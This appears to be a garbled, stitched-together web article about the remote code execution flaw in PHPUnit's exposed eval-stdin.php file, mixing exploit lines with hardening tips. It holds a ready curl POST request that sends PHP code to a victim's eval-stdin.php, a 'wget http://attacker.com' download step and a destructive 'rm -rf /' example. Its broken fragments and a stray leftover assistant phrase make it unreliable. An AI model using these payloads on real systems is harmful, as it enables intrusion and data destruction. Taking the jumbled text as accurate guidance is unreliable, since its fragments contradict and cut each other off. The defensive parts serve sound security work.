Vendor Phpunit Phpunit Src Util Php Eval-stdin.php Exploit Upd Jun 2026

vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php .

This script was designed to facilitate internal testing processes.However, it lacks any form of authentication or access control.If the vendor directory is publicly accessible via the web server, anyone can send an HTTP request to this file and execute code. Vulnerable Versions

The attacker can replace ls -la with commands that install a backdoor, download malware, or exfiltrate data, such as: wget http://attacker.com system("rm -rf /"); (Destructive) Real-World Impact: Why It Still Matters in 2026

curl -X POST https://victim.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "<?php system('id'); ?>" vendor phpunit phpunit src util php eval-stdin.php exploit

Use Composer with the --no-dev flag:

When a developer installs PHPUnit via Composer, the vendor directory is created. If this directory is placed inside the web root (e.g., public_html or var/www/html ) and made accessible via HTTP, anyone on the internet can send a request to this file. Execution Flow

The attack signature was bizarre: POST requests to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php with raw PHP code in the body. vendor/phpunit/phpunit/src/Util/PHP/eval-stdin

Look for GET or POST requests to paths containing:

// ... license header ...

If this file is left accessible in a web-accessible directory (like a public folder), an attacker can send a If this directory is placed inside the web root (e

If you want, I can:

<Directory "/path/to/vendor"> Require all denied </Directory>

This vulnerability is included in the Metasploit Framework ( exploit/multi/http/phpunit_eval stdin ), making exploitation trivial for unskilled attackers.